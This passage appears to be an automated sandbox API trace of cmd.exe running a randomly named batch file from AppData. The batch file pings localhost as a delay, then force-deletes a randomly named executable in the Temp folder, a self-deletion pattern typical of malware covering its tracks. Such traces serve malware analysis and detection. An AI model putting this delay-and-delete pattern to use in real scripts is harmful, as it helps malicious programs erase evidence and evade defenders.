fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0e4) returned 0x3a08f0 [0116.648] FindClose (in: hFindFile=0x3a08f0 | out: hFindFile=0x3a08f0) returned 1 [0116.648] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0116.648] GetConsoleTitleW (in: lpConsoleTitle=0x1ef5bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.775] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0116.778] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0116.778] IdentifyCodeAuthzLevelW () returned 0x1 [0116.784] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0116.784] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0116.785] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0116.785] CloseCodeAuthzLevel () returned 0x1 [0116.785] SetErrorMode (uMode=0x0) returned 0x0 [0116.785] SetErrorMode (uMode=0x1) returned 0x0 [0116.785] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd", nBufferLength=0x104, lpBuffer=0x3a04e8, lpFilePart=0x1ef4a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd", lpFilePart=0x1ef4a8*="sQFgqtRn.cmd") returned 0x3a [0116.785] SetErrorMode (uMode=0x0) returned 0x1 [0116.785] CmdBatNotification () returned 0x0 [0116.785] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\sqfgqtrn.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef4ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0116.785] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0116.785] _get_osfhandle (_FileHandle=3) returned 0x58 [0116.785] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.785] _get_osfhandle (_FileHandle=3) returned 0x58 [0116.785] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.785] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef4d0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1ef4d0*=0x91, lpOverlapped=0x0) returned 1 [0116.787] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0116.787] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0116.787] _get_osfhandle (_FileHandle=3) returned 0x58 [0116.787] GetFileType (hFile=0x58) returned 0x1 [0116.787] _get_osfhandle (_FileHandle=3) returned 0x58 [0116.787] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0116.787] _wcsicmp (_String1="ping", _String2=")") returned 71 [0116.787] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0116.787] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0116.787] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0116.787] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0116.787] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0116.787] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0116.788] _tell (_FileHandle=3) returned 21 [0116.788] _close (_FileHandle=3) returned 0 [0116.789] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef2a4 | out: _Buffer="\r\n") returned 2 [0116.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.789] GetFileType (hFile=0x7) returned 0x2 [0116.789] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.789] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef264 | out: lpMode=0x1ef264) returned 1 [0116.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.789] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef290, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef290*=0x2) returned 1 [0116.789] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0116.789] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0116.789] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1ef2a0 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0116.789] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x1ef2a0 | out: _Buffer=">") returned 1 [0116.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.789] GetFileType (hFile=0x7) returned 0x2 [0116.790] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.790] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef268 | out: lpMode=0x1ef268) returned 1 [0116.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.790] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x1ef294, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x1ef294*=0x19) returned 1 [0116.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.790] GetFileType (hFile=0x7) returned 0x2 [0116.790] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.790] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef4ec | out: lpMode=0x1ef4ec) returned 1 [0116.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.790] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3a0958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x1ef518, lpReserved=0x0 | out: lpBuffer=0x3a0958*, lpNumberOfCharsWritten=0x1ef518*=0x4) returned 1 [0116.790] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef524 | out: _Buffer=" -n 3 localhost ") returned 16 [0116.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.790] GetFileType (hFile=0x7) returned 0x2 [0116.790] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.791] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef4e4 | out: lpMode=0x1ef4e4) returned 1 [0116.791] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.791] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1ef510, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef510*=0x10) returned 1 [0116.791] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef544 | out: _Buffer="\r\n") returned 2 [0116.791] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.791] GetFileType (hFile=0x7) returned 0x2 [0116.791] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.791] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef504 | out: lpMode=0x1ef504) returned 1 [0116.791] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.791] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef530, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef530*=0x2) returned 1 [0116.791] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0116.791] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0116.791] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0116.791] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0116.791] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0116.791] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0116.791] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0116.791] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0116.791] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0116.791] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0116.791] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0116.791] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0116.792] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0116.792] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0116.792] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0116.792] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0116.792] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0116.792] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0116.792] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0116.792] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0116.792] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0116.792] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0116.792] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0116.792] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0116.792] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0116.792] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0116.792] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0116.792] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0116.792] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0116.792] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0116.792] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0116.792] _wcsicmp (_String1="ping", _String2="START") returned -3 [0116.792] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0116.792] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0116.792] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0116.792] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0116.792] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0116.792] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0116.792] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0116.792] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0116.792] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0116.792] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0116.792] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0116.792] SetErrorMode (uMode=0x0) returned 0x0 [0116.792] SetErrorMode (uMode=0x1) returned 0x0 [0116.793] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b0550, lpFilePart=0x1ef2e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef2e8*="Desktop") returned 0x18 [0116.793] SetErrorMode (uMode=0x0) returned 0x1 [0116.793] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0116.793] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0116.793] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.793] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1ef064, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef064) returned 0xffffffff [0116.794] GetLastError () returned 0x2 [0116.794] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x1ef064, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef064) returned 0xffffffff [0116.794] GetLastError () returned 0x2 [0116.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1ef064, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef064) returned 0x3b0838 [0116.794] FindClose (in: hFindFile=0x3b0838 | out: hFindFile=0x3b0838) returned 1 [0116.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x1ef064, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef064) returned 0xffffffff [0116.794] GetLastError () returned 0x2 [0116.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ef064, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef064) returned 0x3b0838 [0116.794] FindClose (in: hFindFile=0x3b0838 | out: hFindFile=0x3b0838) returned 1 [0116.795] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0116.795] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0116.795] GetConsoleTitleW (in: lpConsoleTitle=0x1ef0b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.795] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0116.795] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0116.795] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.795] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1ee950, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee950) returned 0xffffffff [0116.795] GetLastError () returned 0x2 [0116.795] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x1ee950, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee950) returned 0xffffffff [0116.795] GetLastError () returned 0x2 [0116.796] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1ee950, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee950) returned 0x3b0d80 [0116.796] FindClose (in: hFindFile=0x3b0d80 | out: hFindFile=0x3b0d80) returned 1 [0116.796] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x1ee950, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee950) returned 0xffffffff [0116.796] GetLastError () returned 0x2 [0116.796] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ee950, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee950) returned 0x3b0d80 [0116.796] FindClose (in: hFindFile=0x3b0d80 | out: hFindFile=0x3b0d80) returned 1 [0116.796] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0116.796] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0116.796] GetConsoleTitleW (in: lpConsoleTitle=0x1eee48, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.796] InitializeProcThreadAttributeList (in: lpAttributeList=0x1eecd0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1eed98 | out: lpAttributeList=0x1eecd0, lpSize=0x1eed98) returned 1 [0116.796] UpdateProcThreadAttribute (in: lpAttributeList=0x1eecd0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eed90, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1eecd0, lpPreviousValue=0x0) returned 1 [0116.796] GetStartupInfoW (in: lpStartupInfo=0x1eec8c | out: lpStartupInfo=0x1eec8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0116.796] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0116.798] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1eed2c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1eed78 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x1eed78*(hProcess=0x54, hThread=0x58, dwProcessId=0xe70, dwThreadId=0xe74)) returned 1 [0116.891] CloseHandle (hObject=0x58) returned 1 [0116.892] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0116.892] GetEnvironmentStringsW () returned 0x3a0970* [0116.892] FreeEnvironmentStringsW (penv=0x3a0970) returned 1 [0116.892] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0120.816] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1eec6c | out: lpExitCode=0x1eec6c*=0x0) returned 1 [0120.816] CloseHandle (hObject=0x54) returned 1 [0120.816] _vsnwprintf (in: _Buffer=0x1eedb4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1eec78 | out: _Buffer="00000000") returned 8 [0120.816] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0120.816] GetEnvironmentStringsW () returned 0x3a2c28* [0120.816] FreeEnvironmentStringsW (penv=0x3a2c28) returned 1 [0120.816] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0120.816] GetEnvironmentStringsW () returned 0x3a2c28* [0120.817] FreeEnvironmentStringsW (penv=0x3a2c28) returned 1 [0120.817] DeleteProcThreadAttributeList (in: lpAttributeList=0x1eecd0 | out: lpAttributeList=0x1eecd0) [0120.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.817] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.817] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.817] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.817] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.817] SetConsoleInputExeNameW () returned 0x1 [0120.817] GetConsoleOutputCP () returned 0x1b5 [0120.817] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.817] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.818] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\sqfgqtrn.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef4ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0120.818] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0120.818] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.818] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0120.818] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.819] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0120.819] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef4d0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1ef4d0*=0x7c, lpOverlapped=0x0) returned 1 [0120.820] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.820] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\n") returned 62 [0120.820] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.820] GetFileType (hFile=0x54) returned 0x1 [0120.820] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.820] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.822] _tell (_FileHandle=3) returned 83 [0120.822] _close (_FileHandle=3) returned 0 [0120.822] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef2a4 | out: _Buffer="\r\n") returned 2 [0120.822] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.822] GetFileType (hFile=0x7) returned 0x2 [0120.822] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.822] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef264 | out: lpMode=0x1ef264) returned 1 [0120.822] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.822] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef290, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef290*=0x2) returned 1 [0120.822] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0120.822] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0120.822] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1ef2a0 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0120.823] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x1ef2a0 | out: _Buffer=">") returned 1 [0120.823] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.823] GetFileType (hFile=0x7) returned 0x2 [0120.823] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.823] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef268 | out: lpMode=0x1ef268) returned 1 [0120.823] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.823] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x1ef294, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x1ef294*=0x19) returned 1 [0120.823] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.823] GetFileType (hFile=0x7) returned 0x2 [0120.823] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.823] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef4ec | out: lpMode=0x1ef4ec) returned 1 [0120.824] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.824] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3af008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x1ef518, lpReserved=0x0 | out: lpBuffer=0x3af008*, lpNumberOfCharsWritten=0x1ef518*=0x3) returned 1 [0120.824] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef524 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" ") returned 58 [0120.824] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.824] GetFileType (hFile=0x7) returned 0x2 [0120.824] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.824] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef4e4 | out: lpMode=0x1ef4e4) returned 1 [0120.824] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.824] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x1ef510, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef510*=0x3a) returned 1 [0120.825] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef544 | out: _Buffer="\r\n") returned 2 [0120.825] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.825] GetFileType (hFile=0x7) returned 0x2 [0120.825] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.825] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef504 | out: lpMode=0x1ef504) returned 1 [0120.825] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.825] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef530, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef530*=0x2) returned 1 [0120.825] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0120.825] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0120.825] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0120.825] GetConsoleTitleW (in: lpConsoleTitle=0x1ef0b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.826] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee12c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee130, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee12c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0120.826] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0120.826] 